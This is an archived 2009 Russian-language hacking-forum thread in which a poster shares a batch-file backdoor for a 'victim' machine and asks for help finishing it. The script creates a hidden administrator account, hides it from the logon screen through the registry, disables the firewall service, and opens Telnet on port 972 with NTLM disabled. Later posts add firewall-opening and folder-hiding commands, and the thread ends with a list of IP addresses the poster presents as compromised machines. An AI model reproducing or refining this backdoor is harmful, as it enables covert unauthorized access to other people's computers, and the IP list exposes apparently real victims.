PDA

Просмотр полной версии : Что не хватает в bat"нике ?


Vlad&slav
19.06.2009, 00:35
Телнет - сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.

Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у жертвы. Делать это можно с помощью команд cmd
Для этого напишим батник :

chcp 1251
net user SUPPORT_388945a0 /delete
net user qwerty 123 /add
net localgroup Администраторы qwerty /add
net localgroup Administrators qwerty /add
net localgroup Пользователи SUPPORT_388945a0 /del
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "qwerty" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet



Всё вроде верно, но перестало работать :confused:
http://s44.radikal.ru/i103/0906/7a/aa80d3053908.jpg
в том что комп включен уверен на 100%
можт кто блочит, но не все же компы махом 0_o
и адреса приходят

порыскаав по нету нашол команду netsh firewall


netsh firewall add portopening TCP 972 System
или
Netsh firewall add portopening protocol=tcp port=972 mode=enable scope=all
незнаю как правильно и многое ли ето даст

+ хочется добавить скрытость на папку с юзером в документс анд сеттингс
помоему команда
attrib +s +h C:\Documents and Settings\qwerty >nul
должна сработать
Отчётов уже огромный список а войти не могу =(

кто нибудь может помоч мне дописать этого бакдора до конца, учтя все мелочи стукните в аску 2218982
зарание спасибо

Vlad&slav
19.06.2009, 00:39
вот нашол что вместо sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
лучше будет
sc config tlntsvr start= auto >nul
tlntadmn config port=972 sec=-NTLM
net start Telnet >nul

Ponchik
19.06.2009, 09:29
Ябы уже лучше открывалбы удалёный рабочий стол, тоже 1 батником открывается, токо гуглить надо

Cthulchu
19.06.2009, 09:58
что значит открывается одним батником? На сервере что, сидит блонда, которая будет запускать эти батники, или у вас есть админский доступ к этим серверам? Автор, если затираешь айпишник, то затирать нужно последние цифры айпишника, а не первые.

Vlad&slav
19.06.2009, 13:40
что значит открывается одним батником? На сервере что, сидит блонда, которая будет запускать эти батники, или у вас есть админский доступ к этим серверам?
ну это уже другая тема, с этим проблем нету)
Автор, если затираешь айпишник, то затирать нужно последние цифры айпишника, а не первые.
да какая разница....
ВСЁРАВНО СБОЙ :D
у мя их уж список набрался =( ток они сдохли !

.....................
77.40.12.36
80.90.236.240
82.200.252.13
82.207.38.182
82.207.63.63
91.124.246.64
92.115.31.129
92.46.216.175
92.46.218.171
93.80.114.100
93.80.114.100
94.41.141.100
95.52.219.149
95.52.220.11
95.52.23.76
95.59.37.124
....................